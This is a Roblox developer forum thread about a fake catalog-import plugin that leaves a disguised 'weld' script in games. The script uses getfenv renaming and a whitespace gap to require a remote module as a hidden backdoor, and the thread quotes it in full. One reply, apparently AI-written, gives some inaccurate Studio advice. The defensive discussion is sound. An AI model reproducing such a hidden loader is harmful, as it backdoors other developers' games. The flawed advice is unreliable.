(It’s the highlighted model you should be looking at)
I don’t remember adding this module script to my game (the model is a module).
I opened the script and this was the content;
local module = {}
-- hello if u cracked this model, nothing good is here anyways
-- im mostly using this to cashgrab so yeah
function module.IDontLikeWhenYouRequireMe()
warn()
local RS = game:GetService("RunService")
if not RS:IsStudio() then
end
end
function module.Inventory(plr)
warn()
local RS = game:GetService("RunService")
if not RS:IsStudio() then
end
end
return module
On its own, it’s quite strange to me, but I have also seen the function module.IDontLikeWhenYouRequireMe() used before. It is used in a plugin called ‘Load Catalog Items’ by IAVT_FVL.
As the name implies, it’s used for importing accessories and things like that. However it comes with a weld script when you import an accessory. The content of that weld script is;
--- DONT REMOVE THIS. IT MAKES THE HAT STAY IN PLACE.
getfenv()["table"] = require
table(0x1455201FB).IDontLikeWhenYouRequireMe()
(I did not add the huge gap, it was there always)
See what I mean? It uses the same IDontLikeWhenYouRequireMe() for both scripts. This script is basically requiring another module script and using the same function name. Can anyone help me out with this and tell me what the weld script actually does. I know the module script doesn’t do anything, just checks if the game is ran on Studio or not. I think this has been around for a while, but I have only just noticed it now.
EDIT: The plugin I used was a fake compromised replica of another plugin. Should have known that earlier.
Mmh… This could be related to a hidden script or an external plugin causing unexpected behavior. Here’s a structured approach to diagnosing and resolving it:
Steps to Identify & Remove Potential Viruses in Roblox Studio
Search for Suspicious Scripts
Open Roblox Studio and press Ctrl + Shift + F.
Search for keywords like "require", "getfenv", "Instance.new('Script')", or "Instance.new('LocalScript')"—these are often used in malicious scripts.
Check for Hidden Objects
Open Explorer and look for unusual objects in StarterPlayerScripts, StarterCharacterScripts, or ReplicatedStorage.
Some viruses hide scripts inside models or GUI elements.
Disable Plugins Temporarily
Go to Manage Plugins and disable all third-party plugins.
Some plugins may inject unwanted scripts into your game.
Use the MicroProfiler
Press F9 in Studio to open the MicroProfiler.
Look for scripts that are running excessively or creating objects unexpectedly.
Check Free Models
If you’ve used Toolbox assets, inspect them carefully.
Some free models contain hidden scripts that spawn parts or interfere with gameplay.
Reset Studio Settings
Go to File → Studio Settings → Reset Layout to ensure no hidden UI issues.
If the issue persists, consider recreating the game in a fresh place and manually transferring assets to rule out hidden scripts.
Let me know if you need more troubleshooting steps! You can also check out this DevForum discussion on similar virus-related issues.
[PS: I am working to improve my answers to be informative, let me know if you need more things!]
People in the past have been known for naming their malware scripts Weld to make them look harmless or necessary (Have seen a lot of people / games with them). But assuming the top script is the one actually being required, I doubt this is malware, or at least not a functional one. It doesn’t do anything harmful to your game, but it also doesn’t serve any real purpose. It looks more like filler or obfuscation added by the plugin creator, at first i thought it was to discourage tampering, but at the same time why would anyone obfuscate a code that welds some parts together? Well anyways, i recommend deleting the plugin, and removing any script that you don’t recognize from your game.
Thanks for the reply. I have tried your method but nothing new came out. However, I found out that the plugin I used was a fake replica of a real one, which makes more sense with it had malicious code. I’m not sure if the actual module is in my games anymore, I don’t seem to find them, I just don’t know how it got in my asset manager. Normally I would delete the weld scripts, so that’s clear.
I figured so aswell. I was wondering how the module script would do any damage if it only checks for the game being ran in Studio. I also deleted the plugin. Just got me confused especially with the getfenv part.
stop this AI paranoia
Obviously it will flag any professioanl response as AI also it doesn’t explain alghoritm of “detecting AI” (hint: it doesn’t have one)
Using AI (for Roblox in particular, because there’s little documentation compared to something like Unity) can yield incorrect advice. Bad advice is worse than no advice.
When in doubt, exercise caution and don’t use it! If you’re looking for an asset inserter, I had made one years ago. Hopefully it’ll fit your wants and needs.
All the code you provided does is that it requires a module in a sketchy way so it’s hard for common string matching patterns to detect it. There must be hidden code somewhere, but It’s not in this post.
Maybe the dev tried to be sneaky and instead of making the virus right away, they created the dependency, and then kept waiting until enough people installed the plugin before actually injecting in the virus code. Basically gaining user trust first so the victims are much more in the future, a very known pattern in cybersecurity things.
A random thought of mine
If you think about it companies tend to do this too. When a company is small and nobody knows them, they give the user perks the other companies specializing on the same subject don’t because they don’t have to. For example privacy, cheaper pricing or free services, etc. But when that same company gains the reputation they initially wanted, they become just like the companies they were initially fighting, removing most of the features that brought them there.
Could be true actually, but the model for the module script has been shut down so I’m not too sure about that. I have checked for any other scripts that can link to these scripts just briefly, so I probably do need to review them again.
